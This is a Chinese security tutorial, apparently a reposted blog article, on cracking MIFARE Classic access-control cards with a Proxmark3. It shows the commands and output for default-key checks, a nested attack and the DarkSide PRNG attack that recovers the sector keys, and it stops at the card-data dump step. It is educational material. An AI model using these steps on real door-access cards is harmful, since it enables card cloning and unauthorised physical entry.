注册
登录
作者: 雪碧0xroo t@漏洞盒子安全团队 文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用! 0×00 前言国际黑客大会Defcon传统之一:开锁!因为黑客认为锁也是一种安全挑战。我们在黑客题材电影、电视剧中也常常看到:男主女主利用高超的黑客技能侵入目标公司的网络,甚至利用社会工程学突破门禁防护潜入对方办公地点进行物理攻击,如入无人之境。(神盾局、黑客军团、Who am i 貌似都有类似情节)
北上广不相信眼泪 16集 在这一背景下,我们不经思考: 门禁系统作为企业物理第一道屏障,这些硬件基础设施安全是否一直都被忽视? 0×01 准备工作
Linux、Windows环境搭建可参考: RFID Hacking②:PM3入门指南 一文。
1.1 进入PM3工作终端./proxmark3 /dev/ttyACM0
1.2 测试天线proxmark3> hw tune
# LF antenna: 29.98 V @ 125.00 kHz
# LF antenna: 30.39 V @ 134.00 kHz
# LF optimal: 36.30 V @ 129.03 kHz
# HF antenna: 27.90 V @ 13.56 MHz
proxmark3>
1.3 设备固件proxmark3> hw ver #db# Prox/RFID mark3 RFID instrument #db# bootrom: /-suspect 2015-04-02 15:12:04 #db# os: /-suspect 2015-04-02 15:12:11 #db# HF FPGA image built on 2015/03/09 at 08:41:42 0×02 爆破&枚举秘钥2.1 读取卡片proxmark3> hf 14a reader ATQA : 04 00 UID : 2c f0 55 0b SAK : 08 [2] TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1 proprietary non iso14443a-4 card found, RATS not supported 2.2 执行NESTED攻击,枚举&爆破key:proxmark3> hf mf chk *1 ? t No key specified,try default keys chk default key[0] ffffffffffff chk default key[1] 000000000000 chk default key[2] a0a1a2a3a4a5 chk default key[3] b0b1b2b3b4b5 chk default key[4] aabbccddeeff chk default key[5] 4d3a99c351dd chk default key[6] 1a982c7e459a chk default key[7] d3f7d3f7d3f7 chk default key[8] 714c5c886e97 chk default key[9] 587ee5f9350f chk default key[10] a0478cc39091 chk default key[11] 533cb6c723f6 chk default key[12] 8fd0a4f256e9 --SectorsCnt:0 block no:0x03 key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:1 block no:0x07 key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:2 block no:0x0b key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:3 block no:0x0f key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:4 block no:0x13 key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:5 block no:0x17 key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:6 block no:0x1b key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:7 block no:0x1f key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:8 block no:0x23 key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:9 block no:0x27 key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:10 block no:0x2b key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:11 block no:0x2f key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:12 block no:0x33 key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:13 block no:0x37 key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:14 block no:0x3b key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:15 block no:0x3f key type:A key count:13 Found valid key:[ffffffffffff] --SectorsCnt:0 block no:0x03 key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:1 block no:0x07 key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:2 block no:0x0b key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:3 block no:0x0f key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:4 block no:0x13 key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:5 block no:0x17 key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:6 block no:0x1b key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:7 block no:0x1f key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:8 block no:0x23 key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:9 block no:0x27 key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:10 block no:0x2b key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:11 block no:0x2f key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:12 block no:0x33 key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:13 block no:0x37 key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:14 block no:0x3b key type:B key count:13 Found valid key:[ffffffffffff] --SectorsCnt:15 block no:0x3f key type:B key count:13 Found valid key:[ffffffffffff] proxmark3> 成功获得卡片key。 2.3 利用PRNG漏洞,执行mifare “DarkSide”攻击proxmark3> hf mf mifare
-------------------------------------------------------------------------
Executing command. Expected execution time: 25sec on average Press the key on the proxmark3 device to abort both proxmark3 and client. ------------------------------------------------------------------------- uid(2cf0550b) nt(218e1cd8) par(0000000000000000) ks(090a070d060b0501) nr(00000000) |diff|{nr} |ks3|ks3^5|parity | +----+--------+---+-----+---------------+ | 00 |00000000| 9 | c |0,0,0,0,0,0,0,0| | 20 |00000020| a | f |0,0,0,0,0,0,0,0| | 40 |00000040| 7 | 2 |0,0,0,0,0,0,0,0| | 60 |00000060| d | 8 |0,0,0,0,0,0,0,0| | 80 |00000080| 6 | 3 |0,0,0,0,0,0,0,0| | a0 |000000a0| b | e |0,0,0,0,0,0,0,0| | c0 |000000c0| 5 | 0 |0,0,0,0,0,0,0,0| | e0 |000000e0| 1 | 4 |0,0,0,0,0,0,0,0| parity is all zero,try special attack!just wait for few more seconds... key_count:0 Key not found (lfsr_common_prefix list is null). Nt=218e1cd8 Failing is expected to happen in 25% of all cases. Trying again with a different reader nonce... uid(2cf0550b) nt(218e1cd8) par(0000000000000000) ks(0d0407030d070c04) nr(00000001) |diff|{nr} |ks3|ks3^5|parity | +----+--------+---+-----+---------------+ | 00 |00000001| d | 8 |0,0,0,0,0,0,0,0| | 20 |00000021| 4 | 1 |0,0,0,0,0,0,0,0| | 40 |00000041| 7 | 2 |0,0,0,0,0,0,0,0| | 60 |00000061| 3 | 6 |0,0,0,0,0,0,0,0| | 80 |00000081| d | 8 |0,0,0,0,0,0,0,0| | a0 |000000a1| 7 | 2 |0,0,0,0,0,0,0,0| | c0 |000000c1| c | 9 |0,0,0,0,0,0,0,0| | e0 |000000e1| 4 | 1 |0,0,0,0,0,0,0,0| parity is all zero,try special attack!just wait for few more seconds... key_count:0 Key not found (lfsr_common_prefix list is null). Nt=218e1cd8 Failing is expected to happen in 25% of all cases. Trying again with a different reader nonce... uid(2cf0550b) nt(218e1cd8) par(0000000000000000) ks(0d040e0e0c010e00) nr(00000002) |diff|{nr} |ks3|ks3^5|parity | +----+--------+---+-----+---------------+ | 00 |00000002| d | 8 |0,0,0,0,0,0,0,0| | 20 |00000022| 4 | 1 |0,0,0,0,0,0,0,0| | 40 |00000042| e | b |0,0,0,0,0,0,0,0| | 60 |00000062| e | b |0,0,0,0,0,0,0,0| | 80 |00000082| c | 9 |0,0,0,0,0,0,0,0| | a0 |000000a2| 1 | 4 |0,0,0,0,0,0,0,0| | c0 |000000c2| e | b |0,0,0,0,0,0,0,0| | e0 |000000e2| 0 | 5 |0,0,0,0,0,0,0,0| parity is all zero,try special attack!just wait for few more seconds... p1:0 p2:0 p3:0 key:ffffffffffff p1:29e5f p2:18a2b p3:1 key:b8b2a3c07af9 p1:2ba97 p2:19a40 p3:2 key:b5ba0002b5ea p1:2c3fd p2:19fb9 p3:3 key:b4b979ba49de p1:3de0e p2:24775 p3:4 key:968a7a09c714 p1:3fdf4 p2:25a7a p3:5 key:931b36c268ed p1:54f81 p2:32426 p3:6 key:6ecaf371a99d p1:58b75 p2:34777 p3:7 key:6860b744915b p1:616dd p2:3998a p3:8 key:59747d7fdf41 p1:63400 p2:3ab54 p3:9 key:56476bbef406 p1:64ae0 p2:3b844 p3:a key:53dc6ee57a91 p1:6dc19 p2:40e78 p3:b key:44554ae362a1 p1:708f8 p2:42956 p3:c key:3f83eb143dd6 p1:7abf0 p2:48987 p3:d key:2e2b8565f96b p1:7b298 p2:48d82 p3:e key:2d70e3e38553 p1:8420b p2:4e219 p3:f key:1e238b63e204 p1:8ce60 p2:53484 p3:10 key:0f4b7cb380a5 key_count:17 ------------------------------------------------------------------ Key found:ffffffffffff Found valid key:ffffffffffff proxmark3> 通过这一方式,同样可以获得卡片的key,不过很多时候还是要靠运气,因为不是所有的卡片都存在这种漏洞。如果不存在PRNG漏洞,我们则需要通过嗅探卡片和读卡器之间通信的数据包解出卡片的Key。 使用PM3进行中间人攻击嗅探通信数据包的方法可参考: 【RFID Hacking③】ProxMark3使用案例:嗅探银行闪付卡信息 ,以及RadioWar团队的 利用Proxmark3监听M1卡交互过程,算出某一区的key 0×03 dump卡片数据&数据处理使用上述方法,我们成功获得卡片key,接下来我们便可以使用key导出卡片中的所有数据(dumpdata) proxmark3> hf mf nested 1 0 A ffffffffffff d --block no:00 key type:00 key:ff ff ff ff ff ff etrans:0 Block shift=0 Testing known keys. Sector count=16 nested... Time in nested: 0.030 (inf sec per key) ----------------------------------------------- Iterations count: 0 |---|----------------|---|----------------|---| |sec|key A |res|key B |res| |---|----------------|---|----------------|---| |000| ffffffffffff | 1 | ffffffffffff | 1 | |001| ffffffffffff | 1 | ffffffffffff | 1 | |002| ffffffffffff | 1 | ffffffffffff | 1 | |003| ffffffffffff | 1 | ffffffffffff | 1 | |004| ffffffffffff | 1 | ffffffffffff | 1 | |005| ffffffffffff | 1 | ffffffffffff | 1 | |006| ffffffffffff | 1 | ffffffffffff | 1 | |007| ffffffffffff | 1 | ffffffffffff | 1 | |008| ffffffffffff | 1 | ffffffffffff | 1 | |009| ffffffffffff | 1 | ffffffffffff | 1 | |010| ffffffffffff | 1 | ffffffffffff | 1 | |011| ffffffffffff | 1 | ffffffffffff | 1 | |012| ffffffffffff | 1 | ffffffffffff | 1 | |013| ffffffffffff | 1 | ffffffffffff | 1 | |014| ffffffffffff | 1 | ffffffffffff | 1 | |015| ffffffffffff | 1 | ffffffffffff | 1 | |---|----------------|---|----------------|---| Printing keys to bynary file dumpkeys.bin... proxmark3> 在这一过程中,在PM3当前工作目录下生成了dumpkey.bin文件: |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|
